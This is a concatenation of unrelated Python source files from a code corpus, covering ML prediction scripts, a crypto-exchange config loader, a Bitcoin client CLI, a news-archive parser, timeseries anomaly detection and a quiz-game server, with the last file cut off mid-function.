logps = model(images)
ps = torch.exp(logps)
# Top indices
_, top_indices = ps.topk(1)
top_indices = top_indices.detach().cpu().numpy().tolist()
# Convert indices to classes
top_classes = [idx_to_class[idx[0]] for idx in top_indices]
# print("Img:" ,img_names)
for i, img_name in enumerate(img_names):
predictions[img_name] = top_classes[i]
print('\nPrediction Generation Completed')
return predictions
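# Hedged usage sketch (added for illustration, not part of the original script).
# It wires train_model2() and predict() together; the ResNet-50 backbone, the
# epoch count and the Adam optimizer are assumptions, not taken from this repo.
if __name__ == '__main__':
    backbone = models.resnet50(pretrained=True)                 # assumed architecture
    backbone.fc = nn.Linear(backbone.fc.in_features, len(class_names))
    backbone = backbone.to(device)
    criterion = nn.CrossEntropyLoss()
    optimizer = optim.Adam(backbone.parameters(), lr=learning_rate)
    best_model = train_model2(backbone, criterion, optimizer,
                              num_epochs=3, dataloaders=dataloaders,
                              print_progress=True)
    torch.save(best_model, model_pth)                           # predict() expects a fully pickled model
    predictions = predict(model_pth, test_loader, print_progress=True)
    print(len(predictions), 'test images labelled')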
| 2.421875 | 2 |
Arbitrage_Spot/dquant/config.py | ronaldzgithub/CryptoArbitrage | 1 | 12794299 | <filename>Arbitrage_Spot/dquant/config.py
import collections
import logging
from configparser import ConfigParser
from pprint import pprint
import os
from dquant.constants import Constants
from dquant.util import Util
# logging.basicConfig(level=logging.INFO)
# print(__name__)
logger = logging.getLogger(__name__)
section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions'
class MyConfiguration():
__config_dict = collections.defaultdict(dict)
def __init__(self, *file_names):
parser = ConfigParser()
parser.optionxform = str # make option names case sensitive
for file_name in file_names:
found = parser.read(file_name)
            raw_file_name = file_name.split('/')[-1]
group = Util.slice_till_dot(raw_file_name)
if not found:
raise ValueError('No config file found!')
for name in section_names:
self.__config_dict[group].update(parser.items(name))
def pretty_print(self):
pprint(self.__config_dict)
def get_config_base(self, state, key):
try:
result = self.__config_dict[state][key]
logger.info("key={}, result={}".format(key, result))
return result
except KeyError:
logger.error(KeyError)
def get_config(self, key):
return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key)
def get_int_config(self, key):
return int(self.get_config(key))
def get_float_config(self, key):
return float(self.get_config(key))
def get_bool_config(self, key):
return self.get_config(key) == 'true' or self.get_config(key) == 'True'
def get_precisions(self, name, symbol):
# bitfinex_ethusdt_amount
metas = ['min_amount', 'price', 'amount']
return_list = []
for meta in metas:
cfg_name = "{}_{}_{}".format(name.lower(), symbol.lower(), meta)
try:
ret = None
if meta == 'min_amount':
ret = self.get_float_config(cfg_name)
else:
ret = self.get_int_config(cfg_name)
except Exception:
logger.error("Cannot find %s precision: %s %s, using default" % (meta, name.lower(), symbol.lower()))
finally:
return_list.append(ret)
return return_list
cfg = MyConfiguration(os.path.join(os.path.dirname(__file__), '../config/dev.cfg'),
os.path.join(os.path.dirname(__file__), '../config/pro.cfg'))
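# Hedged usage sketch (added; not part of the original module). DQUANT_ENV must
# name one of the loaded config groups ('dev' or 'pro'); the bitfinex/ethusdt
# precision lookup is only an example of keys that may live in dev.cfg/pro.cfg.
if __name__ == '__main__':
    os.environ.setdefault(Constants.DQUANT_ENV, 'dev')
    cfg.pretty_print()
    # returns (min_amount, price_precision, amount_precision); entries missing
    # from the config come back as None
    print(cfg.get_precisions('bitfinex', 'ethusdt'))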
| 2.15625 | 2 |
examples/cli.py | darosior/pylibbitcoin | 3 | 12794300 | import asyncio
import sys
import binascii
import bitcoin.core
import pylibbitcoin.client
def block_header(client):
index = sys.argv[2]
return client.block_header(int(index))
def last_height(client):
return client.last_height()
def block_height(client):
hash = sys.argv[2]
return client.block_height(hash)
def transaction(client):
hash = sys.argv[2]
return client.transaction(hash)
def transaction_index(client):
hash = sys.argv[2]
return client.transaction_index(hash)
def block_transaction_hashes(client):
height = int(sys.argv[2])
return client.block_transaction_hashes(height)
def spend(client):
hash = sys.argv[2]
index = int(sys.argv[3])
return client.spend(hash, index)
async def subscribe_address(client):
address = sys.argv[2]
return await client.subscribe_address(address)
async def _read_from(queue):
while True:
print(await queue.get())
def unsubscribe_address(client):
address = sys.argv[2]
return client.unsubscribe_address(address)
def broadcast(client):
# Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501
# This might seem odd but this is a sanity check a client should probably do. # noqa: E501
block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2]))
return client.broadcast(binascii.hexlify(block.serialize()))
async def history3(client):
address = sys.argv[2]
start_height = 10_000
return await client.history3(address, start_height)
commands = {
"last_height": last_height,
"block_header": block_header,
"block_height": block_height,
"transaction": transaction,
"transaction_index": transaction_index,
"spend": spend,
"subscribe_address": subscribe_address,
"unsubscribe_address": unsubscribe_address,
"broadcast": broadcast,
"history3": history3,
"block_transaction_hashes": block_transaction_hashes,
}
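# Example invocations (added note; a reachable libbitcoin server is assumed):
#   python cli.py last_height
#   python cli.py block_header 400000
#   python cli.py spend <tx_hash> 0
#   python cli.py subscribe_address <address>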
def main():
if len(sys.argv) < 2:
sys.exit("Usage: %s last_height|block_header|<cmd>" % sys.argv[0])
command = sys.argv[1]
if command not in commands:
sys.exit("Command can be %s" % str.join(", ", iter(commands)))
# client = pylibbitcoin.client.Client("tcp://127.0.0.1:9999", settings=pylibbitcoin.client.ClientSettings(timeout=5))
# client = pylibbitcoin.client.Client("tcp://mainnet.libbitcoin.net:9091")
client = pylibbitcoin.client.Client("mainnet.libbitcoin.net", {"query": 9091,
"heartbeat": 9092, "block": 9093, "tx": 9094})
loop = asyncio.get_event_loop()
error_code, result = loop.run_until_complete(commands[sys.argv[1]](client))
print("Error code: {}".format(error_code))
print("Result: {}".format(result))
if type(result) == asyncio.queues.Queue:
loop.run_until_complete(_read_from(result))
number_of_pending_responses = loop.run_until_complete(client.stop())
print("Number of pending responses lost: {}".format(number_of_pending_responses))
loop.close()
if __name__ == '__main__':
main()
| 2.34375 | 2 |
yle_reader_to_dataframe.py | kamalmemon/yle-news-reader | 0 | 12794301 | <reponame>kamalmemon/yle-news-reader<filename>yle_reader_to_dataframe.py
import zipfile
import argparse
import sys
import json
import re
import os
from markdown import markdown
from bs4 import BeautifulSoup
import ftfy
import pandas as pd
def fix_encoding(text):
# MOT: <NAME>ikä\r\ntoimittaja <NAME>en\r\nensiläh. 24.1.2011
return ftfy.fix_text(text, uncurl_quotes=False)
def clean_markdown(text):
# [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä
# kosketinsoittaja **Janne** toivoisi
html = markdown(text)
text = ''.join(BeautifulSoup(html, features="lxml").findAll(text=True))
return text
def main(args):
zip_ = zipfile.ZipFile(args.zipfile)
fnames = zip_.namelist()
num_files = len(fnames)
counter = 0
print("Parsing job started..")
for fname in fnames:
counter += 1
df = pd.DataFrame(
columns=['doc_id', 'yle_id', 'url', 'published', 'text'])
# Reading json data
if not fname.endswith(".json"):
print("Skipping file ", fname)
continue
with zip_.open(fname) as f:
            try:
                data = json.loads(f.read().decode("utf-8"))
            except json.decoder.JSONDecodeError:
                print("Error reading file, skipping ", fname)
                continue
for article in data["data"]:
# Metadata
metadata = {
'doc_id': counter,
'yle_id': article["id"],
'url': article["url"]["full"],
'published': article["datePublished"]
}
# Article content
for paragraph in article["content"]:
# skip images etc.
if paragraph["type"] not in ["text", "heading"]:
text = "N/A"
continue
# 'text' = ['resource', {'id': '6385775'}]
if paragraph["type"] == "heading" and isinstance(paragraph["text"], list):
text = "N/A"
print("skipped paragraph element", paragraph["text"])
continue
text = paragraph["text"].strip()
# slows down, but if there's no hurry then the text will be cleaner
text = fix_encoding(text)
text = clean_markdown(text)
# Parsed data dictionary
parsed_data = {
**metadata,
'text': text
}
df = df.append(parsed_data, ignore_index=True)
# Making output directory
try:
output_fullpath = os.path.join(args.outputdir, fname)
os.makedirs(os.path.dirname(output_fullpath), exist_ok=True)
output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files
except Exception as e:
print("Error creating output path!")
print(e)
# Saving dataframe as pickle
df.to_pickle(output_fullpath)
if counter % 5 == 0:
print("Parsed {x}/{y} files..".format(x=counter, y=num_files))
print("Finished parsing.")
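# Hedged follow-up sketch (added; not in the original script): each parsed
# archive is written back as a pickled DataFrame, so a single result can be
# inspected like this (the file name below is only a placeholder):
#   df = pd.read_pickle('./data/parsed/<archive-file>.pkl')
#   print(df[['yle_id', 'published', 'text']].head())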
if __name__ == "__main__":
argparser = argparse.ArgumentParser(
description='Yle news archive reader - parse archive data to Pandas dataframes')
argparser.add_argument('--zipfile', default="./data/ylenews-fi-2011-2018-src.zip",
help='zipfile downloaded from kielipankki')
argparser.add_argument('--outputdir', default="./data/parsed/",
help='output directory for parsed dataframes')
args = argparser.parse_args()
main(args)
| 2.890625 | 3 |
pyrosetta_documentarian/attributes.py | matteoferla/Pyrosetta-documentarian | 1 | 12794302 | import pyrosetta
import pandas as pd
from typing import Tuple, List, Dict, Set, Any, Optional, Sequence
from .base import BaseDocumentarian
class AttributeDocumentarian(BaseDocumentarian):
"""
Analyses a Pyrosetta object and determines what is different from default.
For example. Give a working XML script:
>>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser()
>>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml')
>>> protocol.apply(pose)
One can reverse engineer it, thusly:
>>> pm = protocol.get_mover(1)
>>> print(pm.mover_name()) # mover called in script!
>>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame
---------------------------
Attributes:
* target: instance
* target_cls: class
* base: The tuple of classes inherited (``__mro__``)
* uninherited: The set of attributes that are absent in the parent class
* citation: string of citation
Methods:
* describe(): describe attributes
* test(): calls the methods
* compare(): compares the results of a ``test()`` to that of a blank instance
"""
@property
def uninherited(self) -> Set[str]:
"""
The set of attributes that are absent in the parent class.
Has no idea if other were overwritten though!
:rtype: Set[str]
"""
if len(self.base) > 1:
return set(dir(self.base[0])) - set(dir(self.base[1]))
def describe(self, iterable: Optional[Sequence[str]] = None) -> None:
"""
Describe attributes by calling help.
If ``iterable`` is provided, it will print only those.
"""
if iterable is None:
iterable = dir(self.target)
for methodname in iterable:
print(f'## {methodname}')
method = getattr(self.target, methodname)
help(method)
def test(self,
iterable: Optional[Sequence[str]] = None,
silent: bool = True) -> Dict[str, Any]:
"""
Calls without arguments the methods.
If ``iterable`` is provided, it will call only those.
Returns a dictionary of the results.
"""
if iterable is None:
iterable = dir(self.target)
results = {}
for methodname in iterable:
method = getattr(self.target, methodname)
try:
result = method()
results[methodname] = result
if silent is False:
print(f'Calling worked for {methodname}: {result}')
except TypeError as error:
results[methodname] = 'N/A'
if silent is False:
print(f'Calling failed for {methodname}: {result}')
return results
def test_uninherited(self, silent: bool = True) -> dict:
"""
Calls without arguments the methods that where not inherited.
"""
return self.test(self.uninherited, silent)
def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame:
"""
Tests the methods (see ``test()`` and compares them to a generic instance
or to ``reference`` if provided.
"""
c = self.test()
if reference is None:
reference = self.target_cls()
refexplorer = self.__class__(reference)
r = refexplorer.test()
return self._make_table(c, r)
def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame:
"""
Tests the uninherited methods (see ``test()`` and compares them to a generic instance
or to ``reference`` if provided.
"""
c = self.test_uninherited()
if reference is None:
reference = self.target_cls()
refexplorer = self.__class__(reference)
r = refexplorer.test_uninherited()
return self._make_table(c, r)
def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame:
assert case, f'make_table cannot make a table without data (case={case}, ref={ref})'
proto = [{'attribute': k,
'target': ref[k],
'reference': case[k],
'equal': str(ref[k]) == str(case[k])} for k in case.keys()]
comparison = pd.DataFrame(proto)
return comparison.set_index(['attribute'])
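# Hedged usage sketch (added; not part of the module). FastRelax is only an
# illustrative mover choice - any configured pyrosetta mover instance should
# work, as in the class docstring above.
if __name__ == '__main__':
    pyrosetta.init()
    mover = pyrosetta.rosetta.protocols.relax.FastRelax()
    doc = AttributeDocumentarian(mover)
    print(doc.compare_uninherited())   # attributes FastRelax adds over its parent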
| 2.984375 | 3 |
mlprimitives/candidates/timeseries_errors.py | Hector-hedb12/MLPrimitives | 0 | 12794303 | import more_itertools as mit
import numpy as np
# Methods to do dynamic error thresholding on timeseries data
# Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf
def get_forecast_errors(y_hat,
y_true,
window_size=5,
batch_size=30,
smoothing_percent=0.05,
smoothed=True):
"""
Calculates the forecasting error for two arrays of data. If smoothed errors desired,
runs EWMA.
Args:
y_hat (list): forecasted values. len(y_hat)==len(y_true).
y_true (list): true values. len(y_hat)==len(y_true).
window_size (int):
batch_size (int):
smoothing_percent (float):
smoothed (bool): whether the returned errors should be smoothed with EWMA.
Returns:
(list): error residuals. Smoothed if specified by user.
"""
errors = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)]
if not smoothed:
return errors
historical_error_window = int(window_size * batch_size * smoothing_percent)
moving_avg = []
for i in range(len(errors)):
left_window = i - historical_error_window
right_window = i + historical_error_window + 1
if left_window < 0:
left_window = 0
if right_window > len(errors):
right_window = len(errors)
moving_avg.append(np.mean(errors[left_window:right_window]))
return moving_avg
def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer):
"""
    Extracts anomalous sequences and their scores from the smoothed errors.
    Args:
        y_true (list): true values; must be longer than window_size * batch_size.
        smoothed_errors (list): (smoothed) error residuals, same length as y_true.
        window_size (int): number of batches evaluated per window.
        batch_size (int): number of points each window advances by.
        error_buffer (int): how many neighbouring points to flag around each anomaly.
    Returns:
        tuple: (anomaly_sequences, anomalies_scores) - (start, end) index pairs and one score per sequence.
"""
if len(y_true) <= batch_size * window_size:
raise ValueError("Window size (%s) larger than y_true (len=%s)."
% (batch_size, len(y_true)))
num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size)
anomalies_indices = []
for i in range(num_windows + 1):
prev_index = i * batch_size
curr_index = (window_size * batch_size) + (i * batch_size)
        if i == num_windows:  # last window: extend to the end of the series
curr_index = len(y_true)
window_smoothed_errors = smoothed_errors[prev_index:curr_index]
window_y_true = y_true[prev_index:curr_index]
epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer)
window_anom_indices = get_anomalies(
window_smoothed_errors,
window_y_true,
sd_threshold,
i,
anomalies_indices,
error_buffer
)
# get anomalies from inverse of smoothed errors
# This was done in the implementation of NASA paper but
# wasn't referenced in the paper
# we get the inverse by flipping around the mean
mu = np.mean(window_smoothed_errors)
smoothed_errors_inv = [mu + (mu - e) for e in window_smoothed_errors]
epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer)
inv_anom_indices = get_anomalies(
smoothed_errors_inv,
window_y_true,
sd_inv,
i,
anomalies_indices,
            error_buffer
)
anomalies_indices = list(set(anomalies_indices + inv_anom_indices))
anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices])
# group anomalies
anomalies_indices = sorted(list(set(anomalies_indices)))
anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)]
anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]]
# generate "scores" for anomalies based on the max distance from epsilon for each sequence
anomalies_scores = []
for e_seq in anomaly_sequences:
denominator = np.mean(smoothed_errors) + np.std(smoothed_errors)
score = max([
abs(smoothed_errors[x] - epsilon) / denominator
for x in range(e_seq[0], e_seq[1])
])
anomalies_scores.append(score)
return anomaly_sequences, anomalies_scores
def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0):
"""Helper method for `extract_anomalies` method.
Calculates the epsilon (threshold) for anomalies.
"""
mu = np.mean(smoothed_errors)
sigma = np.std(smoothed_errors)
max_epsilon = 0
sd_threshold = sd_limit
    # The threshold is determined dynamically by testing multiple Zs.
# z is drawn from an ordered set of positive values representing the
# number of standard deviations above mean(smoothed_errors)
# here we iterate in increments of 0.5 on the range that the NASA paper found to be good
for z in np.arange(2.5, sd_limit, 0.5):
epsilon = mu + (sigma * z)
below_epsilon, below_indices, above_epsilon = [], [], []
for i in range(len(smoothed_errors)):
e = smoothed_errors[i]
if e < epsilon:
# save to compute delta mean and delta std
# these are important for epsilon calculation
below_epsilon.append(e)
below_indices.append(i)
if e > epsilon:
# above_epsilon values are anomalies
for j in range(0, error_buffer):
if (i + j) not in above_epsilon and (i + j) < len(smoothed_errors):
above_epsilon.append(i + j)
if (i - j) not in above_epsilon and (i - j) >= 0:
above_epsilon.append(i - j)
if len(above_epsilon) == 0:
continue
# generate sequences
above_epsilon = sorted(list(set(above_epsilon)))
groups = [list(group) for group in mit.consecutive_groups(above_epsilon)]
above_sequences = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]
mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu
sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma
epsilon = (mean_perc_decrease + sd_perc_decrease) /\
(len(above_sequences)**2 + len(above_epsilon))
# update the largest epsilon we've seen so far
if epsilon > max_epsilon:
sd_threshold = z
max_epsilon = epsilon
# sd_threshold can be multiplied by sigma to get epsilon
return max_epsilon, sd_threshold
def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer):
"""
Helper method to get anomalies.
"""
mu = np.mean(smoothed_errors)
sigma = np.std(smoothed_errors)
epsilon = mu + (z * sigma)
# compare to epsilon
errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies(
smoothed_errors,
epsilon,
y_true,
error_buffer,
window,
all_anomalies
)
if len(errors_seq) > 0:
anomaly_indices = prune_anomalies(
errors_seq,
smoothed_errors,
max_error_below_e,
anomaly_indices
)
return anomaly_indices
def group_consecutive_anomalies(smoothed_errors,
epsilon,
y_true,
error_buffer,
window,
all_anomalies,
batch_size=30):
upper_percentile, lower_percentile = np.percentile(y_true, [95, 5])
accepted_range = upper_percentile - lower_percentile
minimum_index = 100 # have a cutoff value for anomalies until model is trained enough
anomaly_indices = []
max_error_below_e = 0
for i in range(len(smoothed_errors)):
if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 * accepted_range:
# not an anomaly
continue
for j in range(error_buffer):
if (i + j) < len(smoothed_errors) and (i + j) not in anomaly_indices:
if (i + j) > minimum_index:
anomaly_indices.append(i + j)
if (i - j) < len(smoothed_errors) and (i - j) not in anomaly_indices:
if (i - j) > minimum_index:
anomaly_indices.append(i - j)
# get all the errors that are below epsilon and which
# weren't identified as anomalies to process them
for i in range(len(smoothed_errors)):
adjusted_index = i + (window - 1) * batch_size
if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies:
if i not in anomaly_indices:
max_error_below_e = smoothed_errors[i]
# group anomalies into continuous sequences
anomaly_indices = sorted(list(set(anomaly_indices)))
groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)]
e_seq = [(g[0], g[-1]) for g in groups if g[0] != g[-1]]
return e_seq, anomaly_indices, max_error_below_e
def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices):
""" Helper method that removes anomalies which don't meet
a minimum separation from next anomaly.
"""
# min accepted perc decrease btwn max errors in anomalous sequences
MIN_PERCENT_DECREASE = 0.05
e_seq_max, smoothed_errors_max = [], []
for error_seq in e_seq:
if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0:
sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]]
e_seq_max.append(max(sliced_errors))
smoothed_errors_max.append(max(sliced_errors))
smoothed_errors_max.sort(reverse=True)
if max_error_below_e > 0:
smoothed_errors_max.append(max_error_below_e)
indices_remove = []
for i in range(len(smoothed_errors_max)):
if i < len(smoothed_errors_max) - 1:
delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1]
perc_change = delta / smoothed_errors_max[i]
if perc_change < MIN_PERCENT_DECREASE:
indices_remove.append(e_seq_max.index(smoothed_errors_max[i]))
for index in sorted(indices_remove, reverse=True):
del e_seq[index]
pruned_indices = []
for i in anomaly_indices:
for error_seq in e_seq:
if i >= error_seq[0] and i <= error_seq[1]:
pruned_indices.append(i)
return pruned_indices
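# Hedged usage sketch (added; comments only, since these candidate routines are
# sensitive to the shape of the error distribution). With equal-length forecast
# and truth series:
#   errors = get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30)
#   sequences, scores = extract_anomalies(y_true, errors, window_size=5,
#                                         batch_size=30, error_buffer=5)
# y_true must be longer than window_size * batch_size points, otherwise
# extract_anomalies raises a ValueError.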
| 3.265625 | 3 |
mkt/webapps/utils.py | acidburn0zzz/zamboni | 1 | 12794304 | # -*- coding: utf-8 -*-
from collections import defaultdict
import commonware.log
from amo.utils import find_language
import mkt
log = commonware.log.getLogger('z.webapps')
def get_locale_properties(manifest, property, default_locale=None):
locale_dict = {}
for locale in manifest.get('locales', {}):
if property in manifest['locales'][locale]:
locale_dict[locale] = manifest['locales'][locale][property]
# Add in the default locale name.
default = manifest.get('default_locale') or default_locale
root_property = manifest.get(property)
if default and root_property:
locale_dict[default] = root_property
return locale_dict
def get_supported_locales(manifest):
"""
Returns a list of locales found in the "locales" property of the manifest.
This will convert locales found in the SHORTER_LANGUAGES setting to their
full locale. It will also remove locales not found in AMO_LANGUAGES.
Note: The default_locale is not included.
"""
return sorted(filter(None, map(find_language, set(
manifest.get('locales', {}).keys()))))
def dehydrate_content_rating(rating):
"""
{body.id, rating.id} to translated rating.label.
"""
try:
body = mkt.ratingsbodies.dehydrate_ratings_body(
mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])])
except TypeError:
# Legacy ES format (bug 943371).
return {}
rating = mkt.ratingsbodies.dehydrate_rating(
body.ratings[int(rating['rating'])])
return rating.label
def dehydrate_content_ratings(content_ratings):
"""Dehydrate an object of content ratings from rating IDs to dict."""
for body in content_ratings or {}:
# Dehydrate all content ratings.
content_ratings[body] = dehydrate_content_rating(content_ratings[body])
return content_ratings
def dehydrate_descriptors(keys, body=None):
"""
List of keys to lists of descriptor slugs by body.
    ['ESRB_BLOOD', ...] to {'esrb': ['blood'], ...}.
"""
results = defaultdict(list)
for key in keys:
obj = mkt.ratingdescriptors.RATING_DESCS.get(key)
if obj:
# Slugify and remove body prefix.
body, label = key.lower().replace('_', '-').split('-', 1)
if label != 'no-descs':
results[body].append(label)
return dict(results)
def dehydrate_interactives(keys):
"""
List of keys to list of interactive slugs.
['SOCIAL_NETWORKING', ...] to ['social-networking', ...].
"""
results = []
for key in keys:
obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key)
if obj:
results.append(key.lower().replace('_', '-'))
return results
| 2.21875 | 2 |
modules/cli/getcli.py | serchaofan/oakleaf | 0 | 12794305 | <filename>modules/cli/getcli.py
import argparse
from modules import get, run
def parser_hosts_options(parser):
parser.add_argument("-g", "--group", help="Get Hosts from Group")
parser.set_defaults(func=get.print_hosts)
def parser_groups_options(parser):
parser.add_argument("-g", "--group", help="Get Group Info")
parser.set_defaults(func=get.print_groups)
| 2.609375 | 3 |
run.py | sepro/Flask-Server-Panel | 16 | 12794306 | <filename>run.py<gh_stars>10-100
#!/usr/bin/env python3
from serverpanel import create_app
app = create_app('config')
app.run()
| 1.367188 | 1 |
lenet5/mnist_predict.py | fubiye/machine-learning | 0 | 12794307 | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 7 21:27:18 2019
@author: biyef
"""
from PIL import Image, ImageFilter
import tensorflow as tf
import matplotlib.pyplot as plt
import mnist_lenet5_backward
import mnist_lenet5_forward
import numpy as np
def imageprepare():
im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png')
plt.imshow(im)
plt.show()
#print(type(im.getdata()))
tv = list(im.getdata())
tva = [(255-x)*1.0/255.0 for x in tv]
#return np.asarray(im)
return tva
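# Added note: imageprepare() flattens the pixel values as-is, so the PNG is
# assumed to already be a single-channel image whose side length matches
# mnist_lenet5_forward.IMAGE_SIZE; otherwise the later reshape to
# (1, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS) will fail.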
result=imageprepare()
#x = tf.placeholder(tf.float32, [None, 784])
#x = result
with tf.Graph().as_default() as g:
x = tf.placeholder(tf.float32,[1,
mnist_lenet5_forward.IMAGE_SIZE,
mnist_lenet5_forward.IMAGE_SIZE,
mnist_lenet5_forward.NUM_CHANNELS])
#x = tf.placeholder(tf.float32, [None, 784])
#ipt = imageprepare()
#y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE])
#y = mnist_lenet5_forward.forward(x,False,None)
# x = tf.placeholder(tf.float32,[
# [ipt],
# mnist_lenet5_forward.IMAGE_SIZE,
# mnist_lenet5_forward.IMAGE_SIZE,
# mnist_lenet5_forward.NUM_CHANNELS])
# y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE])
# y = mnist_lenet5_forward.forward(x,False,None)
#
# ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY)
# ema_restore = ema.variables_to_restore()
# saver = tf.train.Saver(ema_restore)
#
# correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
#image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png')
# image = tf.cast(image, tf.float32)
y_conv = mnist_lenet5_forward.forward(x,False,None)
#eva = mnist_lenet5_forward.forward([image],False,None)
#prediction = tf.argmax(y,1)
saver = tf.train.Saver()
with tf.Session(graph=g) as sess:
init_op = tf.global_variables_initializer()
sess.run(init_op)
ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH)
saver.restore(sess, ckpt.model_checkpoint_path)
reshaped_xs = np.reshape([result],(
1,
mnist_lenet5_forward.IMAGE_SIZE,
mnist_lenet5_forward.IMAGE_SIZE,
mnist_lenet5_forward.NUM_CHANNELS))
# reshaped_x = np.reshape([ipt],(
# [ipt],
# mnist_lenet5_forward.IMAGE_SIZE,
# mnist_lenet5_forward.IMAGE_SIZE,
# mnist_lenet5_forward.NUM_CHANNELS))
# accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]})
prediction=tf.argmax(y_conv,1)
predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess)
print('recognize result:')
print(predint[0]) | 2.71875 | 3 |
game/server/game_controller.py | adilnumancelik/cmpe487-final_project | 0 | 12794308 | import threading
import pickle
import json
import sys
import random
import uuid
import time
sys.path.append('..')
from game import Game, GameState
from utils import string_to_byte, byte_to_string
class GameController():
SPECIAL_KEYWORD = b"xaxaxayarmaW"
MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds
def __init__(self):
self.active_connections = [None, None]
self.game = Game(4, 4)
self.lock = threading.Lock()
self.receive_question_ts = [None, None]
self.both_players_received = False
self.calibration_acks = [[], []]
self.calibrations = [[{} for _ in range(10)], [{} for _ in range(10)]]
self.ts_difference = 0 # Average difference between timestamps of player 0 and 1.
self.received_acks_cnt = [0, 0]
self.ping_difference = 0
self.ts_info = [{}, {}]
self.answer_ts = [None, None]
def add_connection(self, conn):
id = 1
if self.active_connections[0] == None:
id = 0
self.active_connections[id] = conn
return id
def remove_player(self, id):
with self.lock:
self.active_connections[id] = None
self.game.players_names[id] = None
self.game.reset_board()
self.calibration_acks = [[], []]
self.calibrations = [[{} for _ in range(10)], [{} for _ in range(10)]]
self.ts_difference = 0
self.received_acks_cnt = [0, 0]
self.ping_difference = 0
self.notify_players()
def restart_game(self):
with self.lock:
self.game.reset_board()
self.generate_question()
self.notify_players()
def enter_name(self, id, name):
ready = False
def calibrate_timestamps(self):
def connection_thread(self, conn, id, i):
message = json.dumps({"TYPE": "CALIBRATION", "PAYLOAD": str(i)})
self.calibrations[id][i]["server_send"] = time.time()
conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD)
for i in range(10):
for idx, conn in enumerate(self.active_connections):
if conn:
threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start()
time.sleep(0.2)
with self.lock:
self.game.players_names[id] = name
self.send_id(id)
if self.game.players_names[1 - id] != None:
ready = True
if ready:
threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start()
def notify_players(self):
print("Sending Game information to the all players")
def connection_thread(self, conn, id):
if self.game.state == GameState.QUESTION:
self.ts_info[id][self.game.question_uuid] = {}
self.ts_info[id][self.game.question_uuid]["server_send"] = time.time()
conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD)
for idx, conn in enumerate(self.active_connections):
if conn:
threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start()
def generate_question(self):
print("Generating New Question...")
operator_list = ["+", "-", "*"]
operator = random.choice(operator_list)
limit = 20 if operator == "*" else 100
number_1 = random.randint(1, limit)
number_2 = random.randint(1, limit)
question = str(number_1) + operator + str(number_2)
answer = str(eval(question))
with self.lock:
self.game.state = GameState.QUESTION
self.game.question = question
self.game.answer = answer
self.game.question_uuid = str(uuid.uuid4())
self.receive_question_ts = [None, None]
self.both_players_received = False
self.answer_ts = [None, None]
print("Generated the Question: " + question + " / UUID: " + self.game.question_uuid)
def send_id(self, id):
conn = self.active_connections[id]
message = {
"TYPE": "ID",
"PAYLOAD": id
}
print(f"Sending ID to the Player {id}")
conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD)
def close_connections(self):
for conn in self.active_connections:
if conn:
conn.close()
def calculate_score(self, id, coordinate_x, coordinate_y, character):
